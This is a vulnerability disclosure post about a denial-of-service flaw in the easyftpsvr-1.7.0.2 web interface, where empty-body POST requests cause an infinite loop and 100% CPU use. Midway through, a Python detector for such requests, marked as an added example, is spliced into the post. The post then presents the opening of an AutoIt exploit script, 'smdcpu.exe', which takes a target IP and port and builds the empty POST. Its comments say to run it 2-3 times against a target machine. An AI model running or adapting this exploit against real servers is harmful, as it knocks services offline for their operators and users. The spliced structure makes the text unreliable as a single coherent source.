Vulnerability in the web interface of the easyftpsvr-1.7.0.2 FTP server, with exploit and demo video.
The result of this vulnerability is that CPU usage on the server running the FTP server rises to 100%.
As a result, the target server ends up in a completely abnormal state.
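A defender-side check for the trigger described above, as an added example that is not part of the original post: it classifies raw HTTP requests and flags POSTs whose body is empty, so they can be logged or dropped before they reach Easy-Web Server/1.0. Function names, verdict labels and the sample requests are constructed for illustration.

```python
# Added example; names and sample requests are constructed for illustration.

def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method = lines[0].split(" ", 1)[0].upper()
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, headers, body

def verdict(raw):
    """Classify one request: 'pass', 'empty-post' or 'length-mismatch'."""
    method, headers, body = parse_request(raw)
    if method != "POST":
        return "pass"
    if "chunked" in headers.get("transfer-encoding", "").lower():
        # A chunked body holding only the terminating chunk carries no data.
        return "empty-post" if body.strip() in (b"", b"0") else "pass"
    value = headers.get("content-length", "")
    length = int(value) if value.isdecimal() else None
    if length == 0 or not body:
        return "empty-post"          # the condition the post describes
    if length is None or length != len(body):
        return "length-mismatch"     # declared and actual sizes disagree
    return "pass"

H = b"Host: ftp.example.test\r\n"    # constructed host name
SAMPLES = [                          # constructed requests, not captured traffic
    b"GET / HTTP/1.1\r\n" + H + b"\r\n",
    b"POST / HTTP/1.1\r\n" + H + b"Content-Length: 0\r\n\r\n",
    b"POST / HTTP/1.1\r\n" + H + b"Content-Length: 9\r\n\r\nuser=test",
    b"POST / HTTP/1.1\r\n" + H + b"\r\n",
    b"POST / HTTP/1.1\r\n" + H + b"Content-Length: 20\r\n\r\na=1",
    b"POST / HTTP/1.1\r\n" + H + b"Transfer-Encoding: chunked\r\n\r\n0\r\n\r\n",
]

def scan(requests):
    """Return the verdict for each request, in order."""
    return [verdict(r) for r in requests]

if __name__ == "__main__":
    for raw, result in zip(SAMPLES, scan(SAMPLES)):
        print(result, raw.split(b"\r\n", 1)[0].decode())
```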
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_Outfile=smdcpu.exe
#AutoIt3Wrapper_UseUpx=n
#AutoIt3Wrapper_Change2CUI=y
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
#include "WinHttp.au3"
#include <String.au3>
#cs
easyftpsvr-1.7.0.2 CPU consumption exploit.
The vulnerability is due to a flaw in the easyftpsvr-1.7.0.2 web interface (Easy-Web Server/1.0) when it accepts POST requests with an EMPTY body.
In this case the application runs into an infinite loop and consumes a very high amount of CPU.
Running the following exploit 2-3 times against a target machine that runs easyftpsvr-1.7.0.2 (against its native web interface, called Easy-Web Server/1.0)
causes high CPU usage.
---------------- Be Careful! -----------------
*Do NOT run it against your real machine. (Use VirtualBox instead.)*
Otherwise hard reboot is your best friend.
#ce
Global $ipaddr=StringMid($CmdLine[1],1,15);//255.255.255.255
Global $port=StringMid($CmdLine[2],1,5);//65535
Global $useragent='Mozilla/5.0 (Windows NT 5.1; rv:20.0) Gecko/20100101 Firefox/20.0';
Global $reqmethod='POST';
Global $root_dir='/';
Global $thisconsumes='';//<= This is the reason for the high CPU consumption: an empty POST body causes the application to run into an infinite loop.